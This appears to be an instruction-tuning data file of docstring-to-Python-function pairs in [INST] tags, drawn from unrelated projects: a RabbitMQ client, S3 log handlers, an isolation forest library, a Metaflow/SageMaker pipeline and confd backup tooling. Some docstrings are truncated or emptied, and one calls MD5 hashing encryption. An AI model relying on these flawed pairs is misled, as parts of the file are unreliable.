+ raise exception
+[INST] Implement in child objects to inspect frames for channel specific
+RPC requests from RabbitMQ.. [/INST] def _check_for_rpc_request(self, value):
+ if isinstance(value, specification.Channel.Close):
+ LOGGER.debug('Channel closed')
+ self._on_remote_close(value)
+[INST] Invoke to interrupt the current self._wait_on_frame blocking loop
+in order to allow for a flow such as waiting on a full message while
+consuming. Will wait until the ``_wait_on_frame_interrupt`` is cleared
+to make this a blocking operation.. [/INST] def _interrupt_wait_on_frame(self, callback, *args):
+ if not self._waiting:
+ if self._is_debugging:
+ LOGGER.debug('No need to interrupt wait')
+ return callback(*args)
+ LOGGER.debug('Interrupting the wait on frame')
+ self._interrupt['callback'] = callback
+ self._interrupt['args'] = args
+ self._interrupt['event'].set()
+[INST] Handle RabbitMQ remotely closing the channel. [/INST] def _on_remote_close(self, value):
+ self._set_state(self.REMOTE_CLOSED)
+ if value.reply_code in exceptions.AMQP:
+ LOGGER.error('Received remote close (%s): %s',
+ value.reply_code, value.reply_text)
+ raise exceptions.AMQP[value.reply_code](value)
+ else:
+ raise exceptions.RemoteClosedChannelException(self._channel_id,
+ value.reply_code,
+ value.reply_text)
+[INST] Check to see if a frame is in the queue and if so, return it. [/INST] def _read_from_queue(self):
+ if not self.closing and self.blocking_read:
+ LOGGER.debug('Performing a blocking read')
+ value = self._read_queue.get()
+ self._read_queue.task_done()
+ else:
+ try:
+ value = self._read_queue.get(True, .1)
+ self._read_queue.task_done()
+ except queue.Empty:
+ value = None
+ return value
+[INST] Notifies the IO loop we need to write a frame by writing a byte
+to a local socket.. [/INST] def _trigger_write(self):
+ try:
+ self._write_trigger.send(b'0')
+ except socket.error:
+ pass
+[INST] Validate the frame value against the frame type. The frame type can
+be an individual frame type or a list of frame types.. [/INST] def _validate_frame_type(self, frame_value, frame_type):
+ if frame_value is None:
+ if self._is_debugging:
+ LOGGER.debug('Frame value is none?')
+ return False
+ if isinstance(frame_type, str):
+ if frame_value.name == frame_type:
+ return True
+ elif isinstance(frame_type, list):
+ for frame_t in frame_type:
+ result = self._validate_frame_type(frame_value, frame_t)
+ if result:
+ return True
+ return False
+ elif isinstance(frame_value, specification.Frame):
+ return frame_value.name == frame_type.name
+ return False
+[INST] Read from the queue, blocking until a result is returned. An
+individual frame type or a list of frame types can be passed in to wait
+for specific frame types. If there is no match on the frame retrieved
+from the queue, put the frame back in the queue and recursively
+call the method.. [/INST] def _wait_on_frame(self, frame_type=None):
+ if isinstance(frame_type, list) and len(frame_type) == 1:
+ frame_type = frame_type[0]
+ if self._is_debugging:
+ LOGGER.debug('Waiting on %r frame(s)', frame_type)
+ start_state = self.state
+ self._waiting = True
+ while not self.closed and start_state == self.state:
+ value = self._read_from_queue()
+ if value is not None:
+ self._check_for_rpc_request(value)
+ if frame_type and self._validate_frame_type(value, frame_type):
+ self._waiting = False
+ return value
+ self._read_queue.put(value)
+ try:
+ self._check_for_exceptions()
+ except:
+ self._waiting = False
+ raise
+ if self._interrupt_is_set:
+ if self._is_debugging:
+ LOGGER.debug('Exiting wait due to interrupt')
+ break
+ self._waiting = False
+ if self._interrupt_is_set:
+ self._on_interrupt_set()
+[INST] Create and start the timer that will check every N*2 seconds to
+ensure that a heartbeat has been requested.. [/INST] def _start_timer(self):
+ if not self._interval:
+ return
+ LOGGER.debug('Started a heartbeat timer that will fire in %i sec',
+ self._interval)
+ self._timer = threading.Timer(self._interval, self._check)
+ self._timer.daemon = True
+ self._timer.start()
+[INST] Return the number of bytes read/received from RabbitMQ. [/INST] def bytes_received(self):
+ return self._bytes_read
+[INST] Common functions when a socket error occurs. Make sure to set closed
+and add the exception, and note an exception event.. [/INST] def on_error(self, exception):
+ args = [self._args['host'], self._args['port'], str(exception)]
+ if self._channels[0][0].open:
+ self._exceptions.put(exceptions.ConnectionResetException(*args))
+ else:
+ self._exceptions.put(exceptions.ConnectionException(*args))
+ self._events.set(events.EXCEPTION_RAISED)
+[INST] Connect the socket to the specified host and port.. [/INST] def _connect_socket(self, sock, address):
+ LOGGER.debug('Connecting to %r', address)
+ sock.settimeout(self._args['timeout'])
+ sock.connect(address)
+[INST] The handler for s3 CreateObject event and send the logs to Cloudwatch. [/INST] def handle_s3_logs(event, log_group, log_stream, log_format):
+ data = utils.parse_data(utils.unpack_data_from_s3(event), log_format)
+ cloud_watch = Cloudwatch(log_group, log_stream)
+ cloud_watch.send_logs(data)
+[INST] The handler for s3 CreateObject event to extract akamai log file from email and upload. [/INST] def handle_s3_akamai_email(event, bucket, prefix=''):
+ data = utils.unpack_data_from_s3(event)
+ utils.extract_email_and_upload(data, bucket, prefix)
+[INST] load object from s3 CreateObject event. [/INST] def unpack_data_from_s3(event):
+ bucket = event['Records'][0]['s3']['bucket']['name']
+ key = event['Records'][0]['s3']['object']['key']
+ print("Processing file s3://{}/{}".format(bucket, key))
+ response = S3.get_object(Bucket=bucket, Key=key)
+ data = response['Body'].read()
+ if key[-3:] == '.gz':
+ data = gzip.decompress(data)
+ return data
+[INST] parse data into json format logs. [/INST] def parse_data(data, log_format):
+ logs = []
+ data = str(data, 'utf-8', errors='backslashreplace').splitlines()
+ result = csv.DictReader((row for row in data if not row.startswith('#')),
+ fieldnames=log_format, delimiter='\t')
+ for row in result:
+ date = row.pop('logdate')
+ time = row.pop('logtime')
+ log = {
+ 'message': json.dumps(row),
+ 'timestamp': int(datetime.strptime(
+ date + " " + time, '%Y-%m-%d %H:%M:%S').timestamp() * 1000)
+ }
+ logs.append(log)
+ logs.sort(key=lambda x: x['timestamp'])
+ return logs
+[INST] Extract akamai LDS email data in gzip/mime type. [/INST] def extract_email_and_upload(data, bucket, prefix):
+ try:
+ msg = email.message_from_bytes(data)
+ filename = msg['subject']
+ if not filename or not filename.endswith('.gzm'):
+ print("Invalid file, subject is: " + filename)
+ return 1
+ regx = re.compile('.gzm\\b')
+ count = 0
+ for part in msg.walk():
+ decoded_filename = regx.sub(str(count) + '.gz', filename)
+ if part.get_content_maintype() == 'multipart':
+ continue
+ upload_objects_to_s3(
+ bucket, prefix + decoded_filename, part.get_payload(decode=True))
+ count += 1
+ return 0
+ except Exception as err:
+ raise err
+[INST] Loads address list and contact list in `__onload`. [/INST] def load_address_and_contact(**doc):
+ doc = json.loads(doc.get("doc"))
+ doc_type = doc.get("message").get("doctype")
+ doc_name = doc.get("message").get("name")
+ from frappe.contacts.doctype.address.address import get_address_display, get_condensed_address
+ filters = [
+ ["Dynamic Link", "link_doctype", "=", doc_type],
+ ["Dynamic Link", "link_name", "=", doc_name],
+ ["Dynamic Link", "parenttype", "=", "Address"],
+ ]
+ address_list = frappe.get_all("Address", filters=filters, fields=["*"])
+ address_list = [a.update({"display": get_address_display(a)})
+ for a in address_list]
+ address_list = sorted(address_list,
+ key = functools.cmp_to_key(lambda a, b:
+ (int(a.is_primary_address - b.is_primary_address)) or
+ (1 if a.modified - b.modified else 0)), reverse=True)
+ contact_list = []
+ filters = [
+ ["Dynamic Link", "link_doctype", "=", doc_type],
+ ["Dynamic Link", "link_name", "=", doc_name],
+ ["Dynamic Link", "parenttype", "=", "Contact"],
+ ]
+ contact_list = frappe.get_all("Contact", filters=filters, fields=["*"])
+ for contact in contact_list:
+ contact["email_ids"] = frappe.get_list("Contact Email", filters={
+ "parenttype": "Contact",
+ "parent": contact.name,
+ "is_primary": 0
+ }, fields=["email_id"])
+ contact["phone_nos"] = frappe.get_list("Contact Phone", filters={
+ "parenttype": "Contact",
+ "parent": contact.name,
+ "is_primary_phone": 0,
+ "is_primary_mobile_no": 0
+ }, fields=["phone"])
+ if contact.address:
+ address = frappe.get_doc("Address", contact.address)
+ contact["address"] = get_condensed_address(address)
+ contact_list = sorted(contact_list,
+ key = functools.cmp_to_key(lambda a, b:
+ (int(a.is_primary_contact - b.is_primary_contact)) or
+ (1 if a.modified - b.modified else 0)), reverse=True)
+ return {"address_list":address_list, "contact_list":contact_list}
+[INST] Predict outlierness based on average isolation depth
+Calculates the approximate depth that it takes to isolate an observation according to the
+fitted model splits. Can output either the average depth, or a standardized outlier score
+based on whether it takes more or fewer splits than average to isolate observations. In the
+standardized outlier score metric, values closer to 1 indicate more outlierness, while values
+closer to 0.5 indicate average outlierness, and close to 0 more averageness (harder to isolate).
+
+Note
+
+The more threads that are set for the model, the higher the memory requirements will be as each
+thread will allocate an array with one entry per row.
+
+Note
+
+Predictions for sparse data will be much slower than for dense data. Not recommended to pass
+sparse matrices unless they are too big to fit in memory.
+
+Note
+
+In order to save memory when fitting and serializing models, the functionality for outputting
+terminal node number will generate index mappings on the fly for all tree nodes, even if passing only
+1 row, so it's only recommended for batch predictions.
+
+Note
+
+The outlier scores/depth predict functionality is optimized for making predictions on one or a
+few rows at a time - for making large batches of predictions, it might be faster to use the
+'fit_predict' functionality.
+
+Parameters
+
+X : array or array-like (n_samples, n_features)
+Observations for which to predict outlierness or average isolation depth. Can pass
+a NumPy array, Pandas DataFrame, or SciPy sparse CSC or CSR matrix.
+
+Returns
+
+score : array(n_samples,) or array(n_samples, n_trees)
+Requested output type for each row accoring to parameter 'output' (outlier scores,
+average isolation depth, or terminal node indices).. [/INST] def predict(self, X, output = "score"):
+ assert self.is_fitted_
+ assert output in ["score", "avg_depth", "tree_num"]
+ X_num, X_cat, nrows = self._process_data_new(X)
+ if output == "tree_num":
+ if self.missing_action == "divide":
+ raise ValueError("Cannot output tree number when using 'missing_action' = 'divide'.")
+ if self.new_categ_action == "weighted":
+ raise ValueError("Cannot output tree number when using 'new_categ_action' = 'weighted'.")
+ if nrows == 1:
+ warnings.warn("Predicting tree number is slow, not recommended to do for 1 row at a time.")
+ depths, tree_num = self._cpp_obj.predict(X_num, X_cat, self._is_extended_,
+ ctypes.c_size_t(nrows).value,
+ ctypes.c_int(self.nthreads).value,
+ ctypes.c_bool(output == "score").value,
+ ctypes.c_bool(output == "tree_num").value)
+ if output in ["score", "avg_depth"]:
+ return depths
+ else:
+ return tree_num
+[INST] Appends isolation trees from another Isolation Forest model into this one
+This function is intended for merging models **that use the same hyperparameters** but
+were fitted to different subsets of data.
+
+In order for this to work, both models must have been fit to data in the same format
+that is, same number of columns, same order of the columns, and same column types, although
+not necessarily same object classes .
+
+
+
+Note
+
+This function will not perform any checks on the inputs, and passing two incompatible
+models will result in wrong results and
+potentially crashing the Python process when using it.
+
+Parameters
+
+other : IsolationForest
+Another Isolation Forest model from which trees will be appended to this model.
+It will not be modified during the call to this function.
+
+Returns
+
+self : obj
+This object.. [/INST] def append_trees(self, other):
+ assert self.is_fitted_
+ assert other.is_fitted_
+ assert isinstance(other, IsolationForest)
+ if (self._is_extended_) != (other._is_extended_):
+ raise ValueError("Cannot mix extended and regular isolation forest models (ndim=1).")
+ if self.cols_categ_.shape[0]:
+ warnings.warn("Merging models with categorical features might give wrong results.")
+ self._cpp_obj.append_trees_from_other(other._cpp_obj, self._is_extended_)
+ self.ntrees += other.ntrees
+ return self
+[INST] Export Isolation Forest model
+Save Isolation Forest model to a serialized file along with its
+metadata, in order to be re-used in Python or in the R or the C++ versions of this package.
+
+Although the model objects are always serializable through ``pickle``, this function
+might provide a faster alternative and use less memory when the models to serialize are big.
+
+Note that, if the model was fitted to a ``DataFrame``, the column names must be
+something exportable as JSON, and must be something that R could
+use as column names .
+
+It is recommended to visually inspect the produced ``.metadata`` file in any case.
+
+
+
+
+
+The metadata will contain, among other things, the encoding that was used for
+categorical columns - this is under ``data_info.cat_levels``, as an array of arrays by column,
+with the first entry for each column corresponding to category 0, second to category 1,
+and so on (the C++ version takes them as integers).
+
+The serialized file can be used in the C++ version by reading it as a binary raw file
+and de-serializing its contents with the ``cereal`` library or using the provided C++ functions
+for de-serialization.
+
+The metadata is not used in the C++ version, but is necessary for the R and Python versions.
+
+Note
+
+The model treats boolean variables as categorical. Thus, if the model was fit
+to a ``DataFrame`` with boolean columns, when importing this model into C++, they need to be
+encoded in the same order - e.g.
+
+Parameters
+
+file : str
+The output file path into which to export the model. Must be a file name, not a
+file handle.
+use_cpp : bool
+Whether to use C++ directly for IO. Using the C++ funcionality directly is faster, and
+will write directly to a file instead of first creating the file contents in-memory,
+but in Windows, if the library was compiled with a compiler other than MSVC,
+file paths that contain non-ASCII characters will faill to write
+and might crash the Python process along with it. If passing ``False``, it will at
+first create the file contents in-memory in a Python object, and then use a Python
+file handle to write such contents into a file.
+
+Returns
+
+self : obj
+This object.
+
+References. [/INST] def export_model(self, file, use_cpp = True):
+ assert self.is_fitted_
+ metadata = self._export_metadata()
+ with open(file + ".metadata", "w") as of:
+ json.dump(metadata, of, indent=4)
+ self._cpp_obj.serialize_obj(file, use_cpp, self.ndim > 1)
+ return self
+[INST] Note
+
+Making predictions through SQL is much less efficient than from the model
+itself, as each terminal node will have to check all of the conditions
+that lead to it instead of passing observations down a tree.
+
+Note
+
+If constructed with the default arguments, the model will not perform any
+sub-sampling, which can lead to very big trees. If it was fit to a large
+dataset, the generated SQL might consist of gigabytes of text, and might
+lay well beyond the character limit of commands accepted by SQL vendors.
+
+Note
+
+
+
+Note
+
+The generated SQL statements will only include handling of missing values
+when using ``missing_action="impute"``.
+
+Note
+
+The resulting statements will include all the tree conditions as-is,
+with no simplification. Thus, there might be lots of redundant conditions
+in a given terminal node .
+
+Parameters
+
+enclose : str
+With which symbols to enclose the column names in the select statement
+so as to make them SQL compatible in case they include characters like dots.
+Options are.
+
+
+
+
+
+``"none"``:
+Will output the column names as-is
+output_tree_num : bool
+Whether to make the statements return the terminal node number
+instead of the isolation depth. The numeration will start at zero.
+tree : int or None
+Tree for which to generate SQL statements. If passed, will generate
+the statements only for that single tree. If passing 'None', will
+generate statements for all trees in the model.
+table_from : str or None
+If passing this, will generate a single select statement for the
+outlier score from all trees, selecting the data from the table
+name passed here. In this case, will always output the outlier
+score, regardless of what is passed under ``output_tree_num``.
+select_as : str
+Alias to give to the generated outlier score in the select statement.
+Ignored when not passing ``table_from``.
+column_names : None or list[str]
+Column names to use for the **numeric** columns.
+
+Returns
+
+sql : list[str] or str
+A list of SQL statements for each tree as strings, or the SQL statement
+for a single tree if passing 'tree', or a single select-from SQL statement
+with all the trees concatenated if passing ``table_from``.. [/INST] def generate_sql(self, enclose="doublequotes", output_tree_num = False, tree = None,
+ table_from = None, select_as = "outlier_score",
+ column_names = None, column_names_categ = None):
+ assert self.is_fitted_
+ single_tree = False
+ if tree is not None:
+ if isinstance(tree, float):
+ tree = int(tree)
+ assert isinstance(tree, int)
+ assert tree >= 0
+ assert tree < self.ntrees
+ single_tree = True
+ else:
+ tree = 0
+ output_tree_num = bool(output_tree_num)
+ if self._ncols_numeric:
+ if column_names is not None:
+ if len(column_names) != self._ncols_numeric:
+ raise ValueError("'column_names' must have %d entries." % self._ncols_numeric)
+ else:
+ if self.cols_numeric_.shape[0]:
+ column_names = self.cols_numeric_
+ else:
+ column_names = ["column_" + str(cl) for cl in range(self._ncols_numeric)]
+ else:
+ column_names = []
+ if self.cols_categ_.shape[0]:
+ if column_names_categ is not None:
+ if len(column_names_categ) != self.cols_categ_.shape[0]:
+ raise ValueError("'column_names_categ' must have %d entries." % self.cols_categ_.shape[0])
+ else:
+ column_names_categ = self.cols_categ_
+ categ_levels = [[str(lev) for lev in mp] for mp in self._cat_mapping]
+ else:
+ column_names_categ = []
+ categ_levels = []
+ assert enclose in ["doublequotes", "squarebraces", "none"]
+ if enclose != "none":
+ enclose_left = '"' if (enclose == "doublequotes") else '['
+ enclose_right = '"' if (enclose == "doublequotes") else ']'
+ column_names = [enclose_left + cl + enclose_right for cl in column_names]
+ column_names_categ = [enclose_left + cl + enclose_right for cl in column_names_categ]
+ out = [s for s in self._cpp_obj.generate_sql(self.ndim > 1,
+ column_names, column_names_categ, categ_levels,
+ output_tree_num, single_tree, tree, self.nthreads)]
+ if single_tree:
+ return out[0]
+ return out
+[INST] None
+
+list[ConnectorFile] -- list of files to package
+Returns none if any of the files are invalid, or the files do not agree on the name. [/INST] def generate_file_list(self) -> Optional[List[ConnectorFile]]:
+ logging.debug("Generating list of files for validation and/or packaging...")
+ if not self.path_to_folder.is_dir():
+ logger.error("Error: " + str(self.path_to_folder) + " does not exist or is not a directory.")
+ return None
+ path_to_manifest = self.path_to_folder / "manifest.xml"
+ if not path_to_manifest.is_file():
+ logger.error("Error: " + str(self.path_to_folder) + " does not contain a file called manifest.xml.")
+ return None
+ self.file_list.append(ConnectorFile("manifest.xml", "manifest"))
+ files_valid = self.parse_file(self.file_list[0])
+ if not files_valid:
+ return None
+ if not self.class_name:
+ logger.debug("Class name not found in files.")
+ return None
+ if len(self.loc_strings) > 0:
+ logger.debug("Found translatable strings, looking for resource files...")
+ logger.debug('Strings found:')
+ for s in self.loc_strings:
+ logger.debug("-- " + s)
+ for language in TABLEAU_SUPPORTED_LANGUAGES:
+ resource_file_name = "resources-" + language + ".xml"
+ path_to_resource = self.path_to_folder / Path(resource_file_name)
+ if path_to_resource.is_file():
+ new_file = ConnectorFile(resource_file_name, "resource")
+ xml_violations_buffer = []
+ if not validate_single_file(new_file, path_to_resource, xml_violations_buffer):
+ for error in xml_violations_buffer:
+ logging.debug(error)
+ return None
+ self.file_list.append(ConnectorFile(resource_file_name, "resource"))
+ logging.debug("Adding file to list (name = " + resource_file_name + ", type = resource)")
+ else:
+ logger.debug("No loc files.")
+ logger.debug("Generated file list:")
+ for f in self.file_list:
+ logger.debug("-- " + f.file_name)
+ return self.file_list
+[INST] - True if parsing succeeds
+Appends any new files found in this one to self.file_list and recursively calls parse_file on it
+If any translatable strings are found, append it to self.loc_strings. [/INST] def parse_file(self, file_to_parse: ConnectorFile) -> bool:
+ path_to_file = self.path_to_folder / str(file_to_parse.file_name)
+ xml_violation_buffer = []
+ if not validate_single_file(file_to_parse, path_to_file, xml_violation_buffer):
+ for v in xml_violation_buffer:
+ logger.debug(v)
+ return False
+ logger.debug("Parsing " + str(path_to_file))
+ xml_tree = parse(str(path_to_file))
+ root = xml_tree.getroot()
+ for child in root.iter():
+ if 'file' in child.attrib:
+ new_file_path = str(self.path_to_folder / child.attrib['file'])
+ if not os.path.isfile(new_file_path):
+ logger.debug("Error: " + new_file_path + " does not exist but is referenced in " +
+ str(file_to_parse.file_name))
+ return False
+ logging.debug("Adding file to list (name = " + child.attrib['file'] + ", type = " + child.tag + ")")
+ new_file = ConnectorFile(child.attrib['file'], child.tag)
+ already_in_list = new_file in self.file_list
+ self.file_list.append(new_file)
+ if child.tag != 'script' and not already_in_list:
+ children_valid = self.parse_file(new_file)
+ if not children_valid:
+ return False
+ if 'url' in child.attrib:
+ url_link = child.attrib['url']
+ if not url_link.startswith(HTTPS_STRING):
+ logging.error("Error: Only HTTPS URL's are allowed. URL " + url_link +
+ " is a non-https link in file " + file_to_parse.file_name)
+ return False
+ if 'class' in child.attrib:
+ if not self.class_name:
+ logging.debug("Found class name: " + child.attrib['class'])
+ self.class_name = child.attrib['class']
+ elif child.attrib['class'] != self.class_name:
+ logging.error("Error: class attribute in file " + file_to_parse.file_name +
+ " does not equal class attribute in manifest.")
+ logging.debug(self.class_name + " in manifest, " + child.attrib['class'] + " in " +
+ file_to_parse.file_name)
+ return False
+ for key, value in child.attrib.items():
+ if value.startswith(TRANSLATABLE_STRING_PREFIX):
+ self.loc_strings.append(value)
+ return True
+[INST] Read data in, and parallelize model building with two params (in this case, dummy example with learning rate).. [/INST] def start(self):
+ print("flow name: %s" % current.flow_name)
+ print("run id: %s" % current.run_id)
+ print("username: %s" % current.username)
+ raw_data = StringIO(self.DATA_FILE).readlines()
+ print("Total of {} rows in the dataset!".format(len(raw_data)))
+ self.dataset = [[float(_) for _ in d.strip().split('\t')] for d in raw_data]
+ print("Raw data: {}, cleaned data: {}".format(raw_data[0].strip(), self.dataset[0]))
+ split_index = int(len(self.dataset) * 0.8)
+ self.train_dataset = self.dataset[:split_index]
+ self.test_dataset = self.dataset[split_index:]
+ print("Training data: {}, test data: {}".format(len(self.train_dataset), len(self.test_dataset)))
+ self.learning_rates = [0.1, 0.2]
+ self.next(self.train_model, foreach='learning_rates')
+[INST] Train a dummy regression model with Keras
+and use high-performance s3 client from metaflow to store the model tar file for further processing.. [/INST] def train_model(self):
+ self.learning_rate = self.input
+ import tensorflow as tf
+ from tensorflow.keras import layers
+ import tarfile
+ x_train = np.array([[_[0]] for _ in self.train_dataset])
+ y_train = np.array([_[1] for _ in self.train_dataset])
+ x_test = np.array([[_[0]] for _ in self.test_dataset])
+ y_test = np.array([_[1] for _ in self.test_dataset])
+ x_model = tf.keras.Sequential([
+ layers.Dense(input_shape=[1,], units=1)
+ ])
+ print(x_model.summary())
+ x_model.compile(
+ optimizer=tf.optimizers.Adam(learning_rate=self.learning_rate),
+ loss='mean_absolute_error')
+ history = x_model.fit(x_train, y_train,epochs=100, validation_split=0.2)
+ self.hist = history.history
+ self.results = x_model.evaluate(x_test, y_test)
+ print("Test set results: {}".format(self.results))
+ model_name = "regression-model-{}/1".format(self.learning_rate)
+ local_tar_name = 'model-{}.tar.gz'.format(self.learning_rate)
+ x_model.save(filepath=model_name)
+ with tarfile.open(local_tar_name, mode="w:gz") as _tar:
+ _tar.add(model_name, recursive=True)
+ with open(local_tar_name, "rb") as in_file:
+ data = in_file.read()
+ with S3(run=self) as s3:
+ url = s3.put(local_tar_name, data)
+ print("Model saved at: {}".format(url))
+ self.s3_path = url
+ self.next(self.join_runs)
+[INST] Join the parallel runs and merge results into a dictionary.. [/INST] def join_runs(self, inputs):
+ self.results_from_runs = {
+ inp.learning_rate:
+ {
+ 'metrics': inp.results,
+ 'tar': inp.s3_path
+ }
+ for inp in inputs}
+ print("Current results: {}".format(self.results_from_runs))
+ self.best_learning_rate = choice(list(self.results_from_runs.keys()))
+ self.best_s3_model_path = self.results_from_runs[self.best_learning_rate]['tar']
+ self.next(self.deploy)
+[INST] Use SageMaker to deploy the model as a stand-alone, PaaS endpoint, with our choice of the underlying
+Docker image and hardware capabilities.
+
+
+
+Once the endpoint is deployed, you can add a further step with for example behavioral testing, to
+ensure model robustness . Here, we just "prove" that
+the endpoint is up and running!. [/INST] def deploy(self):
+ from sagemaker.tensorflow import TensorFlowModel
+ ENDPOINT_NAME = 'regression-{}-endpoint'.format(int(round(time.time() * 1000)))
+ print("\n\n================\nEndpoint name is: {}\n\n".format(ENDPOINT_NAME))
+ model = TensorFlowModel(
+ model_data=self.best_s3_model_path,
+ image_uri=self.DOCKER_IMAGE_URI,
+ role=self.IAM_SAGEMAKER_ROLE)
+ predictor = model.deploy(
+ initial_instance_count=1,
+ instance_type=self.SAGEMAKER_INSTANCE,
+ endpoint_name=ENDPOINT_NAME)
+ input = {'instances': np.array([[0.57457947234]])}
+ result = predictor.predict(input)
+ print(input, result)
+ assert result['predictions'][0][0] > 0
+ self.next(self.end)
+[INST] The final step is empty here, but cleaning operations and/or sending hooks for downstream deployment tasks
+is a natural necessity for machine learning DAGs.. [/INST] def end(self):
+ print('Dag ended!')
+[INST] AWS lambda function, to handle incoming GET requests asking our model for predictions.. [/INST] def predict(event, context):
+ print("Received event: " + json.dumps(event))
+ params = event['queryStringParameters']
+ response = dict()
+ start = time.time()
+ input_payload = { 'instances': [[float(params.get('x', '0.0'))]] }
+ result = get_response_from_sagemaker(json.dumps(input_payload),
+ SAGEMAKER_ENDPOINT_NAME,
+ content_type='application/json')
+ if result:
+ print(result)
+ response = result['predictions'][0][0]
+ return wrap_response(status_code=200, body={
+ "prediction": response,
+ "time": time.time() - start,
+ "endpoint": SAGEMAKER_ENDPOINT_NAME
+ })
+[INST] use md5 encryption algorithm to generate a 32bit hex code.. [/INST] def md5hex(text):
+ if isinstance(text, unicode):
+ text = text.encode('utf-8')
+ elif not isinstance(text, str):
+ text = str(text)
+ m = hashlib.md5()
+ m.update(text)
+ return m.hexdigest()
+[INST] backup old toml/tmpl/cfg files from remote confd client to server. [/INST] def backup_files(self):
+ for host in self._hosts:
+ toml_bak = os.path.join(self._l_toml_bak, host)
+ tmpl_bak = os.path.join(self._l_tmpl_bak, host)
+ conf_bak = os.path.join(self._l_conf_bak, host)
+ remove_folder(toml_bak)
+ remove_folder(tmpl_bak)
+ remove_folder(conf_bak)
+ get_folder(toml_bak)
+ get_folder(tmpl_bak)
+ get_folder(conf_bak)
+ toml_pre = '%s/' % os.path.join('toml', self._folder_pre, host)
+ tmpl_pre = '%s/' % os.path.join('tmpl', self._folder_pre, host)
+ conf_pre = '%s/' % os.path.join('conf', self._folder_pre, host)
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=toml_pre, recursive=False)
+ for x in objs:
+ self.minio.remove_object(
+ bucket_name=self._minio_bucket,
+ object_name=x.object_name.encode('utf-8'))
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=tmpl_pre, recursive=False)
+ for x in objs:
+ self.minio.remove_object(
+ bucket_name=self._minio_bucket,
+ object_name=x.object_name.encode('utf-8'))
+ objs = self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=conf_pre, recursive=False)
+ for x in objs:
+ self.minio.remove_object(
+ bucket_name=self._minio_bucket,
+ object_name=x.object_name.encode('utf-8'))
+ aapi = Ansible2API(hosts=[host], **self._ansible_kwargs)
+ tomls = self.get_tomls(host=host)
+ for x in tomls:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='fetch',
+ args=dict(
+ dest='%s/' % toml_bak,
+ src=os.path.join(self._r_toml, x),
+ flat='yes'))
+ msg = 'Toml File Backup: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Toml File Backup: %s' % results
+ app.logger.info(logmsg(msg))
+ self.minio.fput_object(
+ bucket_name=self._minio_bucket,
+ object_name=os.path.join(toml_pre, x),
+ file_path=os.path.join(toml_bak, x))
+ tmpls = self.get_tmpls(host=host)
+ for x in tmpls:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='fetch',
+ args=dict(
+ dest='%s/' % tmpl_bak,
+ src=os.path.join(self._r_tmpl, self._folder_pre, x),
+ flat='yes'))
+ msg = 'Tmpl File Backup: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Tmpl File Backup: %s' % results
+ app.logger.info(logmsg(msg))
+ self.minio.fput_object(
+ bucket_name=self._minio_bucket,
+ object_name=os.path.join(tmpl_pre, x),
+ file_path=os.path.join(tmpl_bak, x))
+ for x in self._files:
+ src = os.path.join(x['dir'], x['name'])
+ file_name = '%s%s%s' % (
+ '@@'.join([x['mode'], x['owner']['name'], x['owner']['group']]),
+ self._broken_word_2,
+ src.replace('/', self._broken_word_1))
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='fetch',
+ args=dict(
+ dest=os.path.join(conf_bak, file_name),
+ src=src, flat='yes'))
+ msg = 'Conf File Backup: %s' % state_sum
+ app.logger.debug(logmsg(msg))
+ msg = 'Conf File Backup: %s' % results
+ app.logger.info(logmsg(msg))
+ file_path = os.path.join(conf_bak, file_name)
+ if os.path.isfile(file_path):
+ self.minio.fput_object(
+ bucket_name=self._minio_bucket,
+ object_name=os.path.join(conf_pre, file_name),
+ file_path=file_path)
+ objs = [os.path.basename(x.object_name.encode('utf-8')) for x in
+ self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=toml_pre,
+ recursive=False)]
+ for x in tomls:
+ if x not in objs:
+ raise Exception('Toml Backup Failed: %s.' % x)
+ objs = [os.path.basename(x.object_name.encode('utf-8')) for x in
+ self.minio.list_objects(
+ bucket_name=self._minio_bucket, prefix=tmpl_pre,
+ recursive=False)]
+ for x in tmpls:
+ if x not in objs:
+ raise Exception('Tmpl Backup Failed: %s.' % x)
+[INST] backup configuration keys using etcd server. [/INST] def backup_keys(self):
+ dir_pre = os.path.join('/', self._key_bak_pre, self._folder_pre)
+ if dir_pre in self.etcd:
+ self.etcd.delete(key=dir_pre, dir=True, recursive=True)
+ for x in self._files:
+ items = self.get_keys(cfg_name=x['name'])
+ for k, v in items.items():
+ ret = self.etcd.write(
+ key=os.path.join(dir_pre, x['name'], k), value=v)
+ msg = 'Etcd Key Backup: %s.' % ret
+ app.logger.info(logmsg(msg))
+[INST] update configuration keys stored in etcd server
+ps: when called for rollback, would delete keys totally new. [/INST] def update_keys(self, rollback=False):
+ for x in self._files:
+ items = (self.get_keys(cfg_name=x['name'], rollback=rollback)
+ if rollback else x['items'])
+ diff = set(x['items'].keys()).difference(set(items.keys()))
+ for k in diff:
+ key = os.path.join('/', self._folder_pre, x['name'], k)
+ if key in self.etcd:
+ ret = self.etcd.delete(key=key)
+ msg = 'Etcd Key Deleted: %s.' % ret
+ app.logger.info(logmsg(msg))
+ for k, v in items.items():
+ ret = self.etcd.write(
+ key=os.path.join('/', self._folder_pre, x['name'], k),
+ value=v)
+ msg = 'Etcd Key Updated: %s.' % ret
+ app.logger.info(logmsg(msg))
+[INST] delete expired configuration keys stored in etcd server. [/INST] def delete_expired_keys(self):
+ for x in self._files:
+ key_pre = os.path.join('/', self._folder_pre, x['name'])
+ if key_pre in self.etcd:
+ father = self.etcd.read(key=key_pre)
+ if hasattr(father, '_children'):
+ for y in father._children:
+ if y['key'].split('/')[-1] not in x['items'].keys():
+ ret = self.etcd.delete(key=y['key'])
+ msg = 'Etcd Key Deleted: %s.' % ret
+ app.logger.info(logmsg(msg))
+[INST] delete expired toml/tmpl files in remote confd client. [/INST] def delete_expired_files(self):
+ cfg_names = [x['name'] for x in self._files]
+ for host in self._hosts:
+ aapi = Ansible2API(hosts=[host], **self._ansible_kwargs)
+ tomls = self.get_tomls(host=host)
+ for x in tomls:
+ config = x.split(self._file_pre)[1].split('toml')[0].strip('.')
+ if config not in cfg_names:
+ state, state_sum, results = ansible_safe_run(
+ aapi=aapi, module='file',
+ args=dict(
+ path=os.path.join(self._r_toml, x),
+ state='absent'))
